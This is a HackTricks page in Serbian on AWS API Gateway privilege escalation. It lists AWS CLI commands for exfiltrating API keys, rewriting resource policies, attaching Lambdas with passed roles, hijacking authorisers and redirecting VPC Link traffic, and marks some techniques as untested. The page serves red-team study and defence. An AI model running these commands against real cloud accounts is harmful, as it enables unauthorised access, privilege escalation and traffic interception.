AWS - Apigateway Privesc

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks

Apigateway

Za više informacija pogledajte:

AWS - API Gateway Enum

apigateway:POST

Sa ovom dozvolom možete generisati API ključeve za konfigurisane API-je (po regionu).

aws --region <region> apigateway create-api-key

Potential Impact: Ne možete izvesti privesc ovom tehnikom, ali možete dobiti pristup osetljivim informacijama.

apigateway:GET

Sa ovom dozvolom možete dohvatiti generisane API keys konfigurisanih API-ja (po regionu).

aws --region <region> apigateway get-api-keys
aws --region <region> apigateway get-api-key --api-key <key> --include-value

Potencijalni uticaj: Ne možete izvršiti privesc ovom tehnikom, ali možete dobiti pristup osetljivim informacijama.

apigateway:UpdateRestApiPolicy, apigateway:PATCH

Sa ovim dozvolama moguće je izmeniti politiku resursa API-ja kako biste sebi omogućili njegovo pozivanje i zloupotrebili potencijalni pristup koji API gateway može imati (npr. pozivanjem ranjivog lambda).

aws apigateway update-rest-api \
--rest-api-id api-id \
--patch-operations op=replace,path=/policy,value='"{\"jsonEscapedPolicyDocument\"}"'

Potencijalni uticaj: Obično nećete moći direktno da privesc ovom tehnikom, ali možete dobiti pristup osetljivim informacijama.

apigateway:PutIntegration, apigateway:CreateDeployment, iam:PassRole

Note

Potrebno testiranje

Napadač sa permisijama apigateway:PutIntegration, apigateway:CreateDeployment, i iam:PassRole može dodati novu integraciju postojećem API Gateway REST API-ju sa Lambda funkcijom koja ima pridružen IAM role. Napadač zatim može pokrenuti Lambda funkciju da izvrši proizvoljan kod i potencijalno stekne pristup resursima povezanим sa IAM role.

API_ID="your-api-id"
RESOURCE_ID="your-resource-id"
HTTP_METHOD="GET"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"
LAMBDA_ROLE_ARN="arn:aws:iam::account-id:role/lambda-role"

# Add a new integration to the API Gateway REST API
aws apigateway put-integration --rest-api-id $API_ID --resource-id $RESOURCE_ID --http-method $HTTP_METHOD --type AWS_PROXY --integration-http-method POST --uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations --credentials $LAMBDA_ROLE_ARN

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Potencijalni uticaj: Pristup resursima povezanim sa IAM role Lambda funkcije.

apigateway:UpdateAuthorizer, apigateway:CreateDeployment

Note

Potrebno testiranje

Napadač sa dozvolama apigateway:UpdateAuthorizer i apigateway:CreateDeployment može izmeniti postojeći API Gateway authorizer da zaobiđe bezbednosne provere ili da izvrši proizvoljan kod kada se prave API zahtevi.

API_ID="your-api-id"
AUTHORIZER_ID="your-authorizer-id"
LAMBDA_FUNCTION_ARN="arn:aws:lambda:region:account-id:function:function-name"

# Update the API Gateway authorizer
aws apigateway update-authorizer --rest-api-id $API_ID --authorizer-id $AUTHORIZER_ID --authorizer-uri arn:aws:apigateway:region:lambda:path/2015-03-31/functions/$LAMBDA_FUNCTION_ARN/invocations

# Create a deployment for the updated API Gateway REST API
aws apigateway create-deployment --rest-api-id $API_ID --stage-name Prod

Mogući uticaj: Zaobilaženje bezbednosnih provera, neautorizovan pristup API resursima.

Note

Potrebno testiranje

Napadač sa dozvolom apigateway:UpdateVpcLink može izmeniti postojeći VPC Link tako da pokazuje na drugačiji Network Load Balancer, potencijalno preusmeravajući privatni API saobraćaj ka neautorizovanim ili malicioznim resursima.

VPC_LINK_ID="your-vpc-link-id"
NEW_NLB_ARN="arn:aws:elasticloadbalancing:region:account-id:loadbalancer/net/new-load-balancer-name/50dc6c495c0c9188"

# Update the VPC Link
aws apigateway update-vpc-link --vpc-link-id $VPC_LINK_ID --patch-operations op=replace,path=/targetArns,value="[$NEW_NLB_ARN]"

Potencijalni uticaj: Neovlašćen pristup privatnim API resursima, presretanje ili ometanje API saobraćaja.

Tip

Učite i vežbajte AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Učite i vežbajte GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Učite i vežbajte Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Podržite HackTricks